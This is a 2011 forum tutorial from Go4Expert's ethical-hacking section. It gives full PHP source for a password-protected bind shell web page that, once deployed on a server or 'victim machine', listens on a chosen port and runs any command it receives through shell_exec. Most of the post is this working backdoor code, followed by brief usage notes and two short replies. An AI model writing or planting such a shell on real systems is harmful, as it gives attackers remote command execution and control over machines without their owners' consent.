Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Bind Shell in PHP - With Authentication Feature (http://www.go4expert.com/articles/bind-shell-php-authentication-feature-t26855/)

lionaneesh 5Oct2011 22:01

Bind Shell in PHP - With Authentication Feature
 
Bind Shell as the name suggests is a piece of code , which is used to host a shell on a server or a victim machine ! Its basically used to control the host machine remotely!

In this tutorial we'll be making a Bind Shell in PHP with a authentication feature for extra protection.

The Code



Code: php

<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/


?>

<html>
<head>
    <title>Bind Shell -- PHP</title>
</head>

<body>

<h1>Welcome to Bind Shell Control Panel </h1>

<p> Fill in the form Below to Start the Bind Shell Service </p>

<?php
if( isset($_GET['port']) &&
    isset($_GET['passwd']) &&
    $_GET['port'] != "" &&
    $_GET['passwd'] != ""
    )
    {
        $address = '127.0.0.1'; // As its a bind shell it will always host on the local machine
       
        // Set the ip and port we will listen on
       
        $port = $_GET['port'];
        $pass = $_GET['passwd'];
        // Set time limit to indefinite execution
        set_time_limit (0);

        if(function_exists("socket_create"))
        {
        // Create a TCP Stream socket
        $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

     
        // Bind the socket to an address/port
       
       
        if(socket_bind($sockfd, $address, $port) == FALSE)
        {
            echo "Cant Bind to the specified port and address!";
        }
        // Start listening for connections
        socket_listen($sockfd,15);
       
   
        $passwordPrompt =
"\n=================================================================\n
PHP Bind Shell\n
\n
@@author : lionaneesh\n
@@facebook : facebook.com/lionaneesh\n
@@Email : lionaneesh@gmail.com\n
\n
=================================================================\n\n

Please Enter Password : "
;
       
        /* Accept incoming requests and handle them as child processes */
        $client = socket_accept($sockfd);
       

        socket_write($client , $passwordPrompt);
       
        // Read the pass from the client
       
        $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
        if(trim($input) == $pass)
        {
            socket_write($client , "\n\n");
            socket_write($client , shell_exec("date /t & time /t")  . "\n" . shell_exec("ver") . shell_exec("date") . "\n" . shell_exec("uname -a"));
            socket_write($client , "\n\n");
            while(1)
            {
                // Print Command prompt
                $commandPrompt ="(Bind-Shell)[$]> ";
                $maxCmdLen = 31337;
                socket_write($client,$commandPrompt);
                $cmd = socket_read($client,$maxCmdLen);
                if($cmd == FALSE)
                {
                    echo "The client Closed the conection!";
                    break;
                }
                socket_write($client , shell_exec($cmd));
            }
        }
        else
        {
            echo "Wrong Password!";
            socket_write($client, "Wrong Password , Please try again \n\n");
        }
        socket_shutdown($client, 2);
        socket_close($socket);
        }
        else
        {
            echo "Socket Conections not Allowed/Supported by the server! <br />";
        }
    }
    else
    {
    ?>
    <table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>Port</td>
                    <td>
                        <input style="width: 200px;" name="port" value="31337" />
                    </td>
                </tr>
                <tr>
                    <td>Passwd </td>
                    <td><input style="width: 100px;" name="passwd" size='5' value="lionaneesh"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Bind :D!"/>
                </td>
                </tr>   
                   
            </table>
         </td>
         </form>
    </tr>
    </table>
    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
    }
?>


Using



The Bind Shell is implemented to be simple to understand and easy to use! The Introduction page is quite self explanatory and will tell you everything you need to know!

Here is a Screen Shot of its working :-

http://imgs.g4estatic.com/shell-php/bind-shell-php.jpg

Enjoy !!!

lionaneesh 6Oct2011 12:23

Re: Shell in PHP - With Authentication Feature
 
Thanks for accepting! Please Check your Visitor Messages!

phpcrazy 27Dec2011 16:21

Re: Bind Shell in PHP - With Authentication Feature
 
yes bro i am going to study all of your article


All times are GMT +5.5. The time now is 15:37.